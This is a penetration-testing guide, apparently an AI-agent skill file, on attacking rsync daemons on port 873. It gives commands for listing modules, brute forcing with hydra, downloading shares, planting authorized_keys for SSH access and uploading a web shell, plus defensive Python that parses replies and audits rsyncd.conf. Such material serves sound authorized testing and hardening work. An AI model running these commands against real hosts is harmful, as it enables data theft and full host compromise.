pentesting-rsync


Testing rsync daemon services (default port 873) for unauthenticated module listing and access, weak/default credentials and brute force, arbitrary file read/download and write/upload (including authorized_keys planting), and rsyncd.conf/secrets misconfiguration during authorized engagements.

By xalgord. Updated 6/6/2026

name: pentesting-rsync
description: Testing rsync daemon services (default port 873) for unauthenticated module listing and access, weak/default credentials and brute force, arbitrary file read/download and write/upload (including authorized_keys planting), and rsyncd.conf/secrets misconfiguration during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
  • penetration-testing
  • network-services
  • rsync
version: '1.0'
author: xalgorix
license: Apache-2.0

Pentesting rsync (port 873)

When to Use

  • Default port 873/tcp for the rsync daemon protocol (rsync://); alternate ports such as 8730 are common on NAS devices.
  • When nmap/banner shows rsync or a connection returns an @RSYNCD: <version> banner.
  • For enumerating exposed "modules" (directory shares), assessing auth requirements, and testing read/write access.

Quick Enumeration

# Banner grab + manual module listing
nc -vn <IP> 873
# Server greets:  @RSYNCD: 31.0   -> echo same line back, then send:  #list
# Server enumerates modules, e.g.:  raidroot  USBCopy  NAS_Public  ... then @RSYNCD: EXIT

# nmap module listing
nmap -sV --script "rsync-list-modules" -p 873 <IP>

# Metasploit module listing
msfconsole -q -x 'use auxiliary/scanner/rsync/modules_list; set RHOSTS <IP>; run; exit'

# Native client listing (also IPv6 / alternate port)
rsync -av --list-only rsync://<IP>
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730

Critical: Checks Most Often Missed

  • Unauthenticated module access — many modules require no password and allow full read (and sometimes write). The #1 miss.
    • How to CONFIRM:
      rsync -av --list-only rsync://<IP>/<module>     # lists without prompting = no auth
      rsync -av rsync://<IP>/<module> ./loot          # downloads recursively
      
  • Auth-required modules revealed by the protocol — a module that responds @RSYNCD: AUTHREQD <challenge> confirms a password gate worth brute forcing.
    • How to CONFIRM: manual nc listing shows @RSYNCD: AUTHREQD ... for that module name.
  • Writable modules → key planting / file overwrite — write access lets you drop authorized_keys, cron jobs, or web shells.
    • How to CONFIRM:
      rsync -av ~/.ssh/ rsync://<IP>/<module>/<user>/.ssh    # upload authorized_keys
      
  • Hidden modules — some shares are not listed; test guessed names (home, backup, www, etc, share).
  • rsyncd.conf / secrets file (post-access) — the secrets file directive in rsyncd.conf points to a user:password file usable for further auth.
    • How to CONFIRM: find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \).

Workflow

Step 1: Enumerate (modules, auth requirement, version)

nc -vn <IP> 873                 # @RSYNCD banner; send back version line then #list
nmap -sV --script rsync-list-modules -p 873 <IP>
rsync -av --list-only rsync://<IP>          # list modules
rsync -av --list-only rsync://<IP>/<module> # probe a module for auth prompt

Step 2: Authenticate (anonymous, default, brute force)

# Anonymous (no creds) listing/copy
rsync -av --list-only rsync://<IP>/<module>

# With credentials (password prompt appears)
rsync -av --list-only rsync://<user>@<IP>/<module>

# Brute force a protected module
hydra -l <user> -P passwords.txt rsync://<IP>
nxc rsync <IP> -u users.txt -p passwords.txt 2>/dev/null   # if supported by your build

Step 3: Exploit / Extract (download, upload, key planting)

# Recursively download a share (preserves attributes/permissions)
rsync -av rsync://<IP>:873/<module> ./rsync_shared
rsync -av rsync://<user>@<IP>:8730/<module> ./rsync_shared

# Upload content (e.g., authorized_keys for SSH access)
rsync -av ~/.ssh/ rsync://<user>@<IP>/<home_module>/.ssh

# Drop a web shell into a writable web module
rsync -av ./shell.php rsync://<IP>/<www_module>/

Step 4: Post-access / pivot

  • If you planted authorized_keys, connect: ssh -i ~/.ssh/id_rsa <user>@<IP>.
  • Locate config/secrets for additional creds: find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \).
  • Mine downloaded backups for credentials, source code, and configuration to pivot to other services.

Key Concepts

| Concept | Description |
|---|---|
| rsync daemon | Native rsync:// protocol on 873 exposing named "modules". |
| Module | A directory share, optionally password-protected, defined in rsyncd.conf. |
| @RSYNCD handshake | Server sends @RSYNCD: <ver>; client echoes it, then #list or a module name. |
| AUTHREQD | @RSYNCD: AUTHREQD <challenge> indicates the module needs a password. |
| Writable module | Write access enables file overwrite, key planting, and web-shell upload. |
| secrets file | rsyncd.conf secrets file directive points to a user:pass credential file. |
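
Reading the daemon replies described above, as an added example (not part of the original skill): a Python parser for saved server output from manual sessions, so a report or a post-fix retest can record which modules still answer without a password. The transcripts are constructed; the `@RSYNCD: OK` and `@ERROR` replies are standard daemon answers not shown on this page, and the parser assumes no MOTD lines are configured.

```python
# Constructed server output from manual sessions (only what the daemon sent back).
LISTING = "@RSYNCD: 31.0\nbackup         \tnightly backups\nhome_user      \t\n@RSYNCD: EXIT\n"
OPEN = "@RSYNCD: 31.0\n@RSYNCD: OK\n"
GATED = "@RSYNCD: 31.0\n@RSYNCD: AUTHREQD Q29uc3RydWN0ZWRDaGFsbGVuZ2U\n"
MISSING = "@RSYNCD: 31.0\n@ERROR: Unknown module 'share'\n"


def parse_session(server_output):
    """Classify the daemon's side of one session as (version, status, detail).

    status is "listing" (detail = [(module, comment), ...]), "open",
    "auth-required" (detail = challenge) or "error" (detail = daemon message).
    """
    lines = [l.rstrip("\r") for l in server_output.split("\n") if l.strip()]
    if not lines or not lines[0].startswith("@RSYNCD: "):
        raise ValueError("no @RSYNCD greeting: not an rsync daemon session")
    version = lines[0].split()[1]  # greeting may carry extra tokens after the version
    modules = []
    for line in lines[1:]:
        if line.startswith("@RSYNCD: OK"):        # module opened with no password
            return version, "open", None
        if line.startswith("@RSYNCD: AUTHREQD"):  # password gate on this module
            return version, "auth-required", line.partition("AUTHREQD ")[2]
        if line.startswith("@ERROR"):             # e.g. unknown module
            return version, "error", line.partition(": ")[2]
        if line.startswith("@RSYNCD: EXIT"):      # end of the #list output
            break
        name, _, comment = line.partition("\t")   # listing row: name<TAB>comment
        modules.append((name.strip(), comment.strip()))
    return version, "listing", modules


def exposure(sessions):
    """Map module name -> status for a dict of {module: saved server output}."""
    return {module: parse_session(out)[1] for module, out in sessions.items()}


if __name__ == "__main__":
    print(parse_session(LISTING))
    print(exposure({"backup": OPEN, "www": GATED, "share": MISSING}))
```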

Tools & Systems

| Tool | Purpose |
|---|---|
| rsync (client) | Module listing, recursive download, and upload over rsync://. |
| nc | Manual @RSYNCD handshake, module enumeration, auth-requirement detection. |
| nmap | NSE rsync-list-modules. |
| Metasploit | auxiliary/scanner/rsync/modules_list. |
| hydra | Brute force of password-protected modules. |
| find | Post-access discovery of rsyncd.conf / rsyncd.secrets. |

Common Scenarios

Scenario 1: Anonymous backup module → data exfiltration

rsync -av --list-only rsync://<IP>/backup lists files without a prompt. rsync -av rsync://<IP>/backup ./loot downloads full system backups containing /etc/shadow and SSH keys.

Scenario 2: Writable home module → SSH access

A home_user module is writable. Uploading authorized_keys via rsync -av ~/.ssh/ rsync://user@<IP>/home_user/.ssh then ssh user@<IP> yields an interactive shell.

Scenario 3: NAS on alternate port

A NAS exposes rsync on 8730. rsync -av --list-only rsync://<IP>:8730 reveals NAS_Public with read access to shared documents and stored credentials.

Output Format

## rsync Finding

**Service**: rsync daemon
**Port**: 873/tcp (protocol 31.0)
**Severity**: High
**Finding**: Unauthenticated, writable module exposing the filesystem
**Evidence**:
  - rsync-list-modules: "backup", "home_user", "www"
  - rsync -av --list-only rsync://<IP>/backup listed files with no auth
  - uploaded authorized_keys to rsync://<IP>/home_user/.ssh and obtained SSH access
**Impact**: Unauthenticated attackers can read sensitive backups and write SSH keys/web shells, leading to full host compromise.
**Recommendation**:
  1. Require authentication on every module (`auth users` + `secrets file`).
  2. Set `read only = yes` unless write is strictly needed; scope `path` tightly.
  3. Bind rsyncd to management networks / restrict by `hosts allow`, or tunnel rsync over SSH instead.
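
A defensive counterpart to the recommendations above, as an added example (not part of the original skill or its repository): a Python audit of rsyncd.conf text that flags modules with no `auth users`, with `read only` disabled, or reachable from any host. The sample config, its paths and the function names are constructed for illustration; it assumes global parameters appear before the first module section.

```python
import re

# Constructed sample rsyncd.conf; module names follow the finding template above.
SAMPLE_CONF = """\
uid = nobody
hosts allow = 10.0.0.0/24

[backup]
path = /srv/backup

[home_user]
path = /home/user
read only = no
hosts allow = *

[www]
path = /var/www
read only = false
auth users = deploy
secrets file = /etc/rsyncd.secrets
"""


def parse_rsyncd_conf(text):
    """Return {module: params}; parameters before the first [module] act as defaults."""
    defaults, modules, current = {}, {}, None
    for line in map(str.strip, text.splitlines()):
        if not line or line.startswith("#"):
            continue
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            current = modules.setdefault(section.group(1).strip(), dict(defaults))
        elif "=" in line:
            name, value = line.split("=", 1)  # only the first '=' is significant
            # whitespace inside parameter names is irrelevant; lower-cased for matching
            key = re.sub(r"\s+", "", name).lower()
            (defaults if current is None else current)[key] = value.strip()
    return modules


def audit(text):
    """Map each module to the weaknesses this page tests for."""
    report = {}
    for module, p in parse_rsyncd_conf(text).items():
        issues = []
        if not p.get("authusers"):  # rsyncd default: anonymous access
            issues.append("anonymous")
        if p.get("readonly", "yes").lower() in ("no", "false", "0"):  # default: yes
            issues.append("writable")
        if p.get("hostsallow", "*") in ("*", "0.0.0.0/0"):  # default: any host
            issues.append("any-host")
        report[module] = issues
    return report
```

Calling `audit(SAMPLE_CONF)` returns one issue list per module; an empty list means none of the three checks fired.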